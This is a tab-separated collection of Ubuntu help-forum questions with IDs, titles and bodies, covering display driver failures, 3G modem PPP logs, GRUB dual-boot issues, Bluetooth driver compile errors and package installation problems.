351060	installing 12.10 messed up xorg	so i finally decided to upgrade from 12.04 and now my ubuntu install has been rendered unusable . i 'm getting the `` no screens detected '' error from xorg in the console , and no mattr how many times i reinstall it xorg keeps throwing the same errors . i already had to do a bunch of hacks like nomodeset just to get to the console , else i would get an infinite tabulator after the purple boot screen . the machine has a 4200hd igp , i even tried installing fglrx legacy ( 4xxx series and below are not supported in regular fglrx anymore ) which was a subpar driver in 12.04 but in hopes that the machine would at least work , but nope , nothing at all . anyone had the same problem ? how do i fix it ? edit : just wanted to add that i upgraded to 13.04 and it did n't solve anything , in fact it might have broken things even further .
351061	how to switch from gui to cli mode and terminate any gui program ?	i am using ubuntu 13.04 64-bit . i need to perform some database benchmarks on my computer so i want to make it in strict terminal mode , without desktop . i know i can ctrl-alt-f1 to go to terminal mode , but there is still graphical desktop running in background . ( using cpu and ram which i do not want it to ) . so please help me to kill all graphical components and switch to only terminal mode ( for better performance ) . i will not need multiple users to be able to log in and do not need to have networking ( all benchmarks will be on localhost interface ) .
351064	why does n't vodafone mobile broadband work in uk ?	i am trying to commission a uk huawei k3772 3g dongle in the linux embedded platform . between the card and the dial-up , this process works normally . the problem lies in the dial-up connection where a dialing script error occurs . an example of my terminal output is as follows below . how can i solve this problem ? please give me some advice . sent [ lcp termreq id=0x3 `` no network protocols running '' ] connection terminated . serial connection established . using channel 5 using interface ppp0 connect : ppp0 < -- > /dev/ttyusb0 sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0xa34dc1ef > < pcomp > < accomp > ] rcvd [ lcp confreq id=0x1 < accomp > < pcomp > < asyncmap 0x0 > < mru 1500 > < magic 0x54c > < auth chap md5 > ] sent [ lcp confack id=0x1 < accomp > < pcomp > < asyncmap 0x0 > < mru 1500 > < magic 0x54c > < auth chap md5 > ] rcvd [ lcp confack id=0x1 < asyncmap 0x0 > < magic 0xa34dc1ef > < pcomp > < accomp > ] rcvd [ chap challenge id=0x1 < 5effc5b4431d5f70aca7507696fc1150 > , name = `` huawei_c hap_srvr '' ] sent [ chap response id=0x1 < cb7593075f09ab0fa445a78712d7806b > , name = `` web '' ] rcvd [ chap success id=0x1 `` welcome ! ! '' ] chap authentication succeeded : welcome ! ! sent [ ccp confreq id=0x1 < mppe -h -m -s -l -d -c > < bsd v1 15 > ] sent [ ipcp confreq id=0x1 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] rcvd [ ipcp confreq id=0x1 ] sent [ ipcp confnak id=0x1 < addr 0.0.0.0 > ] rcvd [ lcp protrej id=0x2 80 fd 01 01 00 0d 12 06 00 00 00 00 15 03 2f ] rcvd [ ipcp confnak id=0x1 < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x2 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] rcvd [ ipcp confreq id=0x2 ] sent [ ipcp confack id=0x2 ] rcvd [ ipcp confnak id=0x2 < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] sent [ ipcp confreq id=0x3 < addr 0.0.0.0 > < ms-dns1 0.0.0.0 > < ms-dns3 0.0.0.0 > ] ipcp : timeout sending config-requests sent [ lcp termreq id=0x2 `` no network protocols running '' ] sent [ lcp termreq id=0x3 `` no network protocols running '' ] connection terminated . serial connection established .
351065	how do i fix the wintv nova-t-500 mt2060 i2c write error ?	i have a pc running ubuntu 12.04 lts with two pci wintv nova t 500 tuner cards . every so often they will fail and require a reboot . when they fail , you get tons of this in syslog : mt2060 i2c write failed ( len=2 ) the problem is also described here : http : //ubuntuforums.org/showthread.php ? t=1535821 although that was nearly 4 years ago ! i have n't tried any of those workarounds yet , although i will shortly . does anybody know a prober fix ? v4l upgrade ? kernel ? new firmware perhaps ? give up and buy new cards ?
351066	how to access web gui via dyndns ?	what i want i want to have access to managing my bittorent sync and transmission applications from the outside of my home network . my system and network i have xubuntu 13.04 on my laptop connected to router via wifi . what i 've done sine i do n't have a static ip , i 've registered an account and domain on no-ip , installed their application and followed the manual to configure . then i turned on web access to btsync and transmission and did port forwarding on my router . the thing is i do n't get how can i finally use it . e.g . i access my btsync from the laptop , where it runs via my_laptop_ip:8888/gui . how can i do that from the outside my network ? if i try my_noip_domain:8888/gui , nothing happens .
351067	troubles with nexus 4 ubuntu touch - ubuntu 13.10 connection	each time i trying to copy anything to my nexus 4 u touch folders i receiving the following error error while copying “img_20130723_220008.jpg” . there was an error copying the file into mtp : // [ usb:001,004 ] /nexus % 204/pictures . show more details libmtp error : could not send object info . any ideas how to fix this ?
351068	standard user password	i 'm using ubuntu 12.04 . i was wondering when a standard user is asked for his password , other than on login or lock screen , i am thinking about disabling it completely .
351069	graphics are being a bit strange , rbg duplicates	so , i recently formatted my windows 8 partition to install ubuntu , i 've used linux on most of my systems over the last few years and decided on using the ubuntu distribution this time around . i 've never had this problem before and it 's kind-of hurting my head . this problem only percists on the graphcis generated by the graphical user interface provided by ubuntu ( i believe is gnome ) , the text has red/green duplications continuing off to the right , aswell as borders of programs , and images . all of the tray icons , and the mouse ( only while hovering the desktop , or a frame . not inside the web-browser . inside the web-browser everything is fine . any ideas ?
351071	ubuntu installation botched up , and now it wo n't install	i just received the latest ubuntu dvd through the post . when i tried installing it , the installation abruptly stopped after just a couple of minutes . now , when i restart my computer , i can choose between windows 7 and ubuntu , but when i click on ubuntu i get a bunch of error messages that i do n't understand . is there any way that i can start the installation process from the beginning ?
351072	e : unable to locate package bfgminer	i recently set up cubieboard with linaro ubuntu 12.04 installed . everything seems to be okay when i try to run these commands : linaro @ cubieboard : ~ $ sudo add-apt-repository ppa : unit3/bfgminer sudo : unable to resolve host cubieboard you are about to add the following ppa to your system : a cpu+gpu+fpga miner for bitcoins ( and other compatible coins ) , by luke dashjr and others : https : //github.com/luke-jr/bfgminer more info : https : //launchpad.net/~unit3/+archive/bfgminer press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpko9l37/secring.gpg ' created gpg : keyring `/tmp/tmpko9l37/pubring.gpg ' created gpg : requesting key 0ae7fcda from hkp server keyserver.ubuntu.com gpg : /tmp/tmpko9l37/trustdb.gpg : trustdb created gpg : key 0ae7fcda : public key `` launchpad ppa for graeme '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok then : linaro @ cubieboard : ~ $ sudo apt-get update sudo : unable to resolve host cubieboard ign http : //ppa.launchpad.net quantal inrelease ign http : //ports.ubuntu.com quantal inrelease ign http : //ppa.launchpad.net quantal inrelease hit http : //ports.ubuntu.com quantal release.gpg ign http : //ppa.launchpad.net precise inrelease hit http : //ports.ubuntu.com quantal release hit http : //ppa.launchpad.net quantal release.gpg hit http : //ppa.launchpad.net quantal release.gpg get:1 http : //ppa.launchpad.net precise release.gpg [ 316 b ] hit http : //ppa.launchpad.net quantal release hit http : //ports.ubuntu.com quantal/main sources hit http : //ppa.launchpad.net quantal release hit http : //ports.ubuntu.com quantal/universe sources get:2 http : //ppa.launchpad.net precise release [ 11.9 kb ] hit http : //ports.ubuntu.com quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe armhf packages hit http : //ppa.launchpad.net quantal/main sources hit http : //ports.ubuntu.com quantal/main translation-en hit http : //ppa.launchpad.net quantal/main armhf packages hit http : //ports.ubuntu.com quantal/universe translation-en hit http : //ppa.launchpad.net quantal/main sources hit http : //ppa.launchpad.net quantal/main armhf packages get:3 http : //ppa.launchpad.net precise/main sources [ 653 b ] get:4 http : //ppa.launchpad.net precise/main armhf packages [ 14 b ] ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net quantal/main translation-en ign http : //ppa.launchpad.net precise/main translation-en fetched 12.8 kb in 3s ( 4033 b/s ) reading package lists ... done and : linaro @ cubieboard : ~ $ sudo apt-get upgrade sudo : unable to resolve host cubieboard reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . after that i get error when trying to install bfgminer : linaro @ cubieboard : ~ $ sudo apt-get install bfgminer sudo : unable to resolve host cubieboard reading package lists ... done building dependency tree reading state information ... done e : unable to locate package bfgminer i have added bfgminer repositories before to /etc/apt/sources.list file : deb http : //ports.ubuntu.com/ubuntu-ports/ quantal main universe deb-src http : //ports.ubuntu.com/ubuntu-ports/ quantal main universe deb http : //ppa.launchpad.net/unit3/bfgminer/ubuntu quantal main deb-src http : //ppa.launchpad.net/unit3/bfgminer/ubuntu quantal main do n't know why this happens ! waiting for your help .
351073	can i still use ubuntu after support period expired ?	can i still use it regardless of the customer support ? i just want to have ubuntu for work and music , while my other os is for gaming and general purposes .
351074	software which opens psd files correctly on ubuntu ?	i am stuck in trying to find a software which can render psd files properly under ubuntu . i have tried gimp and krita but they both have problems with that - especially the clipping mask functionality . is there a working solution for ubuntu ?
351080	what racing games run on ubuntu ?	i am new to ubuntu . i used to play need for speed titles on windows . what racing games run on ubuntu ?
351085	how to remove recommended and suggested dependencies of uninstalled packages ?	i know of how to remove an uninstalled package 's dependencies ? and i tried apt-get autoremove but that does not remove dependencies that are recommended/suggested by other packages . that is , if i install a package x that recommends y , but i do not install y , and then i install package z that depends on y. and later i do apt-get remove -- auto-remove z then y is not automatically removed even though nothing depends on it . ( x `` picked up '' y , even though it does not depend on it ) .
351090	booting windows 8 using grub command	i am using both ubuntu and windows 8 on my laptop . i want to hide the windows menu title from the grub-menu and boot it through the grub command . after i get into grub after pressing c and typing chainloader ( hd0 , gpt5 ) +1 , the promt shows no such file found . my windows is in gpt5 , while ubuntu is in gpt6 . some1 tell me how to hide the windows menu and use grub command to boot it thanks
351093	how to pass url as variable to wget.. ?	i am trying download a page using wget by passing variable which holds url using python , but it did n't work . url=http : //www.adobe.com/support/security/ os.system ( `` wget -p download url '' ) can anyone specify what is wrong with this ... ?
351094	ubuntu 12.04 does not recognize hdmi and displayport outputs in dell precision m4700	i 've just bought a tv/monitor and when is connected to my laptop by dp output nothing happens . it only shows a log saying `` there is no signal coming from your computer '' . the same for the hdmi output . maybe it is a problem with drivers . i do not know . i wish somebody could help . thanks . i attach the following logs : rbaena @ fajnmp2 : ~ $ uname -a linux fajnmp2 3.2.0-38-generic # 61-ubuntu smp tue feb 19 12:18:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux rbaena @ fajnmp2 : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise rbaena @ fajnmp2 : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1920x1080 60.0*+ 59.9 40.0 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) rbaena @ fajnmp2 : ~ $ sudo lshw -c display *-display unclaimed description : vga compatible controller product : gk107glm [ quadro k1000m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller cap_list configuration : latency=0 resources : memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff *-display description : vga compatible controller product : 3rd gen core processor graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:46 memory : f6400000-f67fffff memory : d0000000-dfffffff ioport : f000 ( size=64 )
351095	how to add gnome applications to favourites ?	i 'm trying to build a linux distro in suse studio , but i want to add a default application to the favourites . i 've got the hang of making a .desktop file in /usr/share/applications but how would i put it in favourites without right-clicking and pinning ? ( so automatically - either with the terminal or by putting the .desktop file in another location . ) anyone got any ideas ?
351097	passing multiple commands to gnome-terminal from a script	my bash-script is not run in a terminal , but opens a terminal at runtime to ask for user input ( sudo password ) . i would like to tell the user in this terminal what the script is trying to do . first , here is my script : # ! /bin/bash # this should install : qt linguist , lrelease # for qt linguist dpkg-query -l qt4-dev-tools if echo $ ? == 0 ; then check1=1 fi # for lrelease dpkg-query -l qt4-default if echo $ ? == 0 ; then check2=1 fi echo $ check1 echo $ check2 if [ $ check1 = 1 ] & & [ $ check2 = 1 ] ; then gnome-terminal -x sudo apt-get install qt4-dev-tools qt4-default fi $ shell this opens a terminal with this : [ sudo ] password for `` username '' : but i would like to have : qt4-dev-tools and qt4-default are missing . now trying to install . [ sudo ] password for `` username '' : how do i get this when starting the terminal with gnome-terminal -x ?
351098	how can i make the file manager toolbar buttons smaller ?	screenshot : i want to make those buttons at the main toolbar smaller because they just do n't seem right this way , but how ? i 'm using unity .
351100	is there something in grep similar to what * is in filename substitution ?	i am required to find all lines that start with a capital letter and ends with the word dog followed by a period . i know that to find lines starting with a capital letter i would do : egrep ^ [ a-z ] filename and to find lines that end with `` dog . '' i would do : egrep dog. $ filename however how would i do them both together ? i have tried : egrep ^ [ a-z ] *dog. $ filename but it does not seem to work . in filename substitution the * character represented a string of any length , or no string at all even .
351105	audio devices have disappeared ; how to re-install the drivers ?	i was trying to stop the popping sounds my system was creating every few seconds and now i 've got no audio devices . it seemed like a powersave option but i was unable to turn the powersave off . i then found some guides about pulseaudio causing problems and how it might stop the popping if removed . i must have went too far . any ideas for getting my audio back ? what follows is some system settings that might be helpful . no devices in the sound settings gui , which you can see here : http : //s8.postimg.org/3zzcoyo85/sound_settings.jpg . typing : aplay -l displays : list of playback hardware devices ** card 0 : mid [ hda intel mid ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : mid [ hda intel mid ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 0 : alc282 analog [ alc282 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : pch [ hda intel pch ] , device 1 : alc282 digital [ alc282 digital ] subdevices : 1/1 subdevice # 0 : subdevice # 0 typing : cat /proc/asound/cards displays : 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xc2610000 irq 48 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xc2614000 irq 49 the relevent parts of : lshw displays : *-multimedia:0 description : audio device product : xeon e3-1200 v3/4th gen core processor hd audio controller vendor : intel corporation physical id : 3 bus info : pci @ 0000:00:03.0 version : 06 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : c2610000-c2613fff *-multimedia:1 description : audio device product : 8 series/c220 series chipset high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 04 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:49 memory : c2614000-c2617fff
351109	could aptitude or tasksel be forced to show download and install progress bars for all packages ?	is there a way to force tasksel or aptitude to show a progress bar regardless what package will be installed . are there other ways to visualize installation processes with dpkg or something similr ?
351114	how do i install qps from repositories on ubuntu 13 ?	i 'm trying to install qps on ubuntu with aptitude install qps where i get could n't find package `` qps '' . ... i probably could download the sources and recompile , but i think i might be missing some repositories or something ( and that 's a better way because i 'll get the updates automatically afterwards ) . can anybody tell me how i can install qpt from repositories , and how i find repositories where the package is located in the future ?
351118	adding virtual machine to lightdm	is there a way for a virtual machine to start directly from lightdm ? i have installed android in virtualbox which i want to add in lightdm for direct access . i am enjoying my chromium os from lightdm , can i do such a thing with android too ? distribution : ubuntu 12.04.2 virtualbox version : 4.2 android version:4.3
351123	how is it determined which application is to open a file of specific mime-type ?	i saw the following question , but i ca n't comment yet . so i decided to create a separate one . i have both transmission and deluge installed . and i have no association for application/x-bittorrent mime type , based on contents of /usr/share/gnome/applications/defaults.list and ~/.local/share/applications/mimeapps.list . but it seems .torrent extension has association and it 's transmission . that is when i double-click a .torrent file , transmission is opened . the same goes for when i open it in chromium . the question is how come it is transmission ? why not deluge ? both have this mime type in their .desktop files . are the associations stored somewhere else ? upd $ egrep bittorrent /usr/share/applications/mimeapps.list egrep : /usr/share/applications/mimeapps.list : no such file or directory $ egrep bittorrent /usr/share/applications/mimeinfo.cache application/x-bittorrent=transmission-gtk.desktop ; deluge.desktop ; $ egrep bittorrent /usr/share/applications/defaults.list $ egrep bittorrent /home/yuri/.local/share/applications/mimeapps.list $ egrep bittorrent /home/yuri/.local/share/applications/defaults.list egrep : /home/yuri/.local/share/applications/defaults.list : no such file or directory the default is transmission . changing order in /usr/share/applications/mimeinfo.cache changes the default application . probably one should n't rely on this behavior .
351130	ubuntu boots to black screen on hp pavillion having radeon graphics card	i am a one of the new user to ubuntu and downloaded the ubuntu 12.04 , i installed to my laptop 7 or 8 times but i could not see anything in the screen which means screen is coming black color , and i asked from my friend they said that problem is in the drivers of the laptop . specifications : hp pavilion g series , ram-2gb , vga-radeon tm hd 6470 please friend give the best answers , i am waiting for your answers .
351133	can not find my data in lost+found folder in home folder	i am using ubuntu 12.04 . i kept all my data in lost+found folder in home folder . if i open this folder , it is coming that i do not have permission to open this folder . here are the commands i am getting : srujana @ srujana-desktop : /home $ ls -l /home total 20 drwx -- -- -- 2 srujana srujana 16384 jul 22 00:40 lost+found drwxr-xr-x 32 srujana srujana 4096 sep 28 17:43 srujana i do n't understand where has all my data gone . please help me.thank you .
351135	notebook fn + f1 to switch the display , so why would the letter p ?	i use dell notebook and ubuntu 12.04 . a few days ago fn+f1 suddenly type letter p instead of switch display monitor . need your help please .
351137	symbolic link size error in tzdata-java ( ( ( answered ) ) )	while updating from 12.04lts to 12.10 the following tzdata symbolic link error shows up . the answer function was removed since this was marked as duplicate , i guess . the solution i used was reluctantly copied the rosario zone data file from the package to `` /usr/share/zoneinfo/right/america/ '' . ( made a backup first though ) run apt-get -f install and the new tzdata package for 12.10 installed successfully run apt-get autoremove i believe all is well now . preparing to replace tzdata 2013d-0ubuntu0.12.04 ( using ... /tzdata_2013d-0ubuntu0.12.10_all.deb ) ... unpacking replacement tzdata ... symbolic link '/usr/share/zoneinfo/right/america/rosario ' size has changed from 17 to 4 below is the results from recommended apt-get command . any help is apprecieated ... thanks ! unpacking replacement tzdata ... dpkg : error processing /var/cache/apt/archives/tzdata_2013d-0ubuntu0.12.10_all.deb ( -- unpack ) : symbolic link '/usr/share/zoneinfo/right/america/rosario ' size has changed from 17 to 4 no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/tzdata_2013d-0ubuntu0.12.10_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
351138	rt3290 bluetooth not working	i have an hp envy h8-1437c system and my bluetooth is not working . i am running ubuntu 13.04 with kubuntu-desktop installed . this is a uefi system , but legacy boot is turned on . i have a ralink rt3290 wireless and bluetooth card , and the wireless works fine . when i go to the bluetooth settings in kde , i am told that no bluetooth adapters were found . here is one part of the output of lspci -v : 03:00.1 bluetooth : ralink corp. rt3290 bluetooth subsystem : hewlett-packard company device 18ec flags : fast devsel , irq 11 memory at f7200000 ( 32-bit , non-prefetchable ) [ disabled ] [ size=64k ] capabilities : and rfkill list : 0 : phy0 : wireless lan soft blocked : no hard blocked : no as you can see , bluetooth simply does not show up . i know that my computer is capable of using bluetooth ; it worked before i wiped windows and it is clearly advertised on the box that the computer came in . i tried downloading the driver for the bluetooth card from http : //downloads.zotac.com/mediadrivers/mb/download/nb087_ubuntu.zip . when i follow the instructions from here , i get stuck at the first step . here is the output of the make command when i am in ~/downloads/rtbth_v3.9.3/rtbth_v3.9.3 : make -c /lib/modules/3.8.0-19-generic/build m=/home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3 modules make ( 1 ) : entering directory /usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.o /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:38:44 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘__devinitdata’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c : in function ‘rtbt_pci_suspend’ : /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:60:43 : error : ‘struct hci_dev’ has no member named ‘driver_data’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c : in function ‘rtbt_pci_resume’ : /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:87:46 : error : ‘struct hci_dev’ has no member named ‘driver_data’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c : at top level : /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:101:22 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtbt_pci_probe’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:228:23 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘rtbt_pci_remove’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:288:14 : error : ‘rtbt_pci_ids’ undeclared here ( not in a function ) /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:290:11 : error : ‘rtbt_pci_probe’ undeclared here ( not in a function ) /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:292:2 : error : implicit declaration of function ‘__devexit_p’ [ -werror=implicit-function-declaration ] /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:292:24 : error : ‘rtbt_pci_remove’ undeclared here ( not in a function ) /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c : in function ‘bthisr’ : /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:346:40 : error : ‘struct hci_dev’ has no member named ‘driver_data’ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c : at top level : /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.c:42:1 : error : ‘__mod_pci_device_table’ aliased to undefined symbol ‘rtbt_pci_ids’ cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3/rtbth_core_pci.o ] error 1 make [ 1 ] : *** [ _module_/home/ashwin/downloads/rtbth_v3.9.3/rtbth_v3.9.3 ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.8.0-19-generic' make : * [ all ] error 2 i do not know why i can not build the package . based on other people 's reports , the driver works once you build it . i need the rtbth.ko file to put into /etc/wireless/rt3290 . please help me get my bluetooth working ... thanks ! edit : i just read another askubuntu post about this , with the same problem as me . please see here . i am wondering if i can somehow download the rtbth.ko file from somewhere , since that is really all i need to get bluetooth working ... i appreciate any help on this topic . i know i could switch back to ubuntu 12.04 lts , but i really ca n't because there is software on ubuntu 13.04 that i need for work ... thanks again !
351141	startup applications not running proccess ( goodsync )	i have defined the following .desktop file in ~/.config/autostart : [ desktop entry ] version=9.5.7 name [ en_us ] =goodsync server name=goodsync server comment [ en_us ] =start goodsync server comment=start goodsync server exec=/opt/goodsync-release-x86_64/gs-server terminal=true type=application categories=utility ; application ; x-gnome-autostart-enabled=true but the gs-server is not being run at startup . if i ran it from terminal manually , there is no problem . what could be the reason that this configuration does not work ( maybe because i have it in opt ) ?
351142	update qemu on ubuntu 12.04	currently ubuntu 12.04 comes with qemu 1.0 , i would like to update this to a newer version ( 1.5/1.6 ) to achieve maximum performance . however there does n't seem to be an apt package for versions > 1.0 is it safe to install this from source , will it break my system ? anyone tried this before ?
351143	update ubuntu 12.04 lts to 13.04 without losing dual boot	this is my first question and i hope that some one could help please . so i have a dell laptop given by my school , with grub dual boot . i have windows 8 and ubuntu 12.04 lts . i would like to know if i update ubuntu from the manager will i lose the windows boot ? how could i do just to update it without touching the windows os neither the grub . thank you very much for your help ^^
351145	update error in ubunru 12.04	i am trying to update the usual software update but the screen shows the following broken dependencies shows error broken count > 0 . and says this usually means that you have unmet dependencies . kindly suggest
351147	lubuntu not automatically reducing screen brightness ( ao532h )	i just installed lubuntu 13.04 on my acer aspire one 532h and ca n't get the screen to automatically dim when the computer is idle . manual dim works via the keyboard . in the preferences for the xfce power manager i set to reduce screen brightness to 20 % after 12 seconds of idleness ( in battery mode ) , but nothing happens , even after reboot . the 'monitor power management control'-option in the general-tab is ticked . i already uninstalled xscreensaver since i read this could be a solution but it did n't help..
351149	brackethighlighter in sublime text 3 not working	fresh install subl3 from webupd8 repo install brackethighlighter by going to ~/.config/sublime-text-3/packages/user and git clone -b bh2st3 git : //github.com/facelessuser/brackethighlighter.git `` brackethighlighter '' now , menu in tools > packages > brackethighlighter is unactive and all settings in preferences > package settings > bracket highlighter are empty , but they are not empty in config files in ~/.config/sublime-text-3/packages/user/brackethighlighter . moreover , when i want to save new settings to bracket settings - default i 'm getting this error : unable to save ~/.config/sublime-text-3/packages/brackethighlighter/bh_core.sublime-settings error : unable to create tmp file in /home/user_name/.config/sublime-text-3/packages/brackethighlighter . what 's wrong ? how to solve this ? launching sublime by sudo subl do n't solve this problem . i was trying to install sublime 3 from official .deb package too - nothing changed at all .
351150	where did my windows go ?	i am a newbie to ubuntu . i was trying to dual boot my windows 7 pc . so , i made a bootable usb and proceeded to install ubuntu 12.04 i am aware that during installation there are three options : 1 . install alongside windows 7 2 . get rid of windows 7 3 . something else well , the something else option gave me something else than what i thought . before i installed ubuntu i had 4 partitions ( including system reserve ) , c d e. c is where windows 7 was d is where data was ( and still is ) e is where i decided to install ubuntu . so , i went to the something else option , selected the /sda4/ which was e : / drive and clicked on install now . all went well . on restart , it started ubuntu ( was n't i supposed to get an option to boot either this or windows 7 ? ) now , the data is there . however , i do not get the option to start windows . how do i get that option back ? update : here is what i have tried so far : 1 . manually editing the grub entries 2 . try boorrepair by using boot repair i can boot to either windows 7 or ubuntu 12.04 lts however , there is no option to choose from the two at start up .
351151	ubuntu 13.04 did not load after installing	i tried installing ubuntu 13.04 on my hp pavilion g6 notebook which came with windows8 pre-installed . i tried it with a dvd and choose `` erase everything and install ubuntu '' afer installation when i reboot my pc it did not load ubuntu instead shown a screen like '' boot image did not authenticate press entre to continue '' on pressing entre it shut off every time . i tried abd tried installing it but it did not work . so please help me how to fix this error ... ..
351152	3g modem randomly disconnects on ubuntu 12.04	i am using d-link modem with bsnl sim card and it took some changes to get it recognized as a modem and ultimately the sakis script got it to work pretty well . i still am using network manager to connect and disconnect . it will run sometimes twenty minutes , more often about an hour , and once or twice it kept running til i had to sign off . i can usually get it connected again , but it will not run very long after it has disconnected itself . what command line can i run to tell me what the problem is ? or does anyone recognize what i need to do to fix it ? i am not entirely literate in linux so please keep it simple .
351155	upgrading ubuntu server minimal install	i currently have an ubuntu server 13.04 minimal install . if i upgrade when 13.10 is released will it install all of the default packages of ubuntu server ?
351156	how to display number of lines that are blank or contain these characters	i have to count the number of lines that contains comma , apostrophe , or is a completely blank line . i know to count the number of blank lines i would do egrep -xc '' filename but i am not so sure how to do all of it at once , to also get the lines with apostrophe and comma also , as well as blank lines .
351159	e : unable to locate package libqt5scripttools5	i 'm following a tutorial to compile something , i 've followed it to the letter but i 'm getting errors when trying to install some of the required packages ... chaoss @ ubuntu : ~ $ sudo apt-get install libqt5scripttools reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libqt5scripttools i 've tried sudo-apt get update but that has n't made any difference , please help
351164	installing with source and package	i recently installed mysql and apache from source , and php using apt-get . i wanted to install php with source , so i removed php package but accidentally removed packages named `` mysql-common apache2.2-common etc ... '' i do n't remember installing any of those packages . the only thing i did after installing ubuntu on my desktop is installing mysql , apache with source . my question is : does ubuntu recognize installed-from-source programs as packages ? ?
